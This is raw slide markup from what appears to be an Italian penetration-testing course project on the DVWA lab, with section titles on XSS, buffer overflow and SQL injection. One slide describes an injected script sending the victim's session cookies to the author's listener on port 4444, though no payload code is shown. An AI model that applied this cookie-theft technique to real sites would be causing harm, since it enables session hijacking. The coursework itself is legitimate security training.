                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="-9963" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1672016" y="438998"/>
            <a:ext cx="1474348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3.6 - XSS IN AZIONE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 9" id="9"/>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10" id="10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="-882939" y="572906"/>
            <a:ext cx="6881168" cy="9535438"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 11" id="11"/>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2" id="12"/>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3" id="13"/>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4" id="14"/>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5" id="15"/>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6" id="16"/>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7" id="17"/>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8" id="18"/>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9" id="19"/>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1" id="21"/>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22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9163050" y="1354475"/>
            <a:ext cx="8561396" cy="2564647"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2564647" w="8561396">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8561396" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8561396" y="2564647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2564647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9396052" y="4179260"/>
            <a:ext cx="8158256" cy="5329624"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5329624" w="8158256">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8158256" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8158256" y="5329624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5329624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 24" id="24"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="44" t="0" r="44" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="6419879" y="2802058"/>
            <a:ext cx="2464785" cy="2378518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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strike="noStrike" u="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>GIORNO 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 27" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="355255" y="2763958"/>
            <a:ext cx="6288161" cy="5233286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3451"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2465">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Inseriamo lo script nella pagina della DVWA e una volta premuto invio, avremo un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2465">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>aggiornamento della pagina con il form cieco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2465">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3451"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3451"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2465">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Ma come possiamo vedere nel nostro terminale, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2465">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>lo script ha avuto successo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2465">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, reindirizzando tutti i cookie della sessione sul nostro web server in ascolto sulla porta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2465">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2465">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3451"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3451"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2465">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>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219042" y="442756"/>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174669" y="2228461"/>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2110547" y="3815306"/>
            <a:ext cx="14768151" cy="2118334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7769"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="7769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10499" spc="-955">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>GIORNO   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10499" spc="-955">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>3</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2" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="118091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
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4659592" y="6724069"/>
            <a:ext cx="14768151" cy="634131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>SYSTEM EXPLOIT BOF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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5868" y="-635766"/>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94065" y="44628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9954" y="763155"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="15751273" y="-1086697"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3796150" y="763155"/>
            <a:ext cx="13253600" cy="8642702"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3490660" cy="2276267"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="3490660" cy="2276267"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2276267" w="3490660">
                  <a:moveTo>
                    <a:pt x="14603" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3476057" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3479930" y="0"/>
                    <a:pt x="3483644" y="1539"/>
                    <a:pt x="3486383" y="4277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3489122" y="7016"/>
                    <a:pt x="3490660" y="10730"/>
                    <a:pt x="3490660" y="14603"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3490660" y="2261664"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3490660" y="2269729"/>
                    <a:pt x="3484122" y="2276267"/>
                    <a:pt x="3476057" y="2276267"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14603" y="2276267"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6538" y="2276267"/>
                    <a:pt x="0" y="2269729"/>
                    <a:pt x="0" y="2261664"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="14603"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10730"/>
                    <a:pt x="1539" y="7016"/>
                    <a:pt x="4277" y="4277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7016" y="1539"/>
                    <a:pt x="10730" y="0"/>
                    <a:pt x="14603" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="3490660" cy="2323892"/>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3908993" y="5077050"/>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2051378" y="3236663"/>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0" r="0" b="-139600"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 16" id="16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8076046" y="4691551"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 17" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8057145" y="6635288"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="5957387" y="2001589"/>
            <a:ext cx="11145651" cy="795019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="6580"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4700" spc="-681">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>GIORNO 3 - SYSTEM EXPLOIT BOF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4312674" y="999807"/>
            <a:ext cx="12689927" cy="886461"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" spc="-728">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>INDICE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>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Freeform 21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12471826" y="4691551"/>
            <a:ext cx="4094226" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4114800" w="4094226">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4094226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40942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2590327" y="950176"/>
            <a:ext cx="5511612" cy="738072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6043"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4317">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>INDICE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12080162" y="1531102"/>
            <a:ext cx="5511612" cy="440891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3523"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2517">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>GIORNO 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7095206" y="2844233"/>
            <a:ext cx="7786516" cy="5705475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>1 - DESCRIZIONE FUNZIONAMENTO PROGRAMMA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    1.1 - Breve descrizione  del Linguaggio C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    1.2 - Buffer Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>2 - RIPRODUZIONE ED ESECUZIONE PROGRAMMA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    2.1 - Descrizione del programma</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    2.2 - Esecuzione Programma</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>3 - MODIFICA PROGRAMMA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>     3.1 - Modifica del codice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>     3.2 - Segmentation Fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>     3.3 -  Codice di sicurezza   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>     3.4 - Verifica codice di sicurezza</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="d"/>
  </p:transition>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895255"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1146515" y="3901580"/>
            <a:ext cx="15381560" cy="3406776"/>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1 - Configurazione </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Laboratorio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Virtuale</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2873192" y="3582051"/>
            <a:ext cx="3925100" cy="7766485"/>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453220" y="548630"/>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WEB APPLICATION EXPLOIT SQLI</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1" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1146515" y="2455495"/>
            <a:ext cx="15381560" cy="688974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>TRACCIA - GIORNO 1 :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
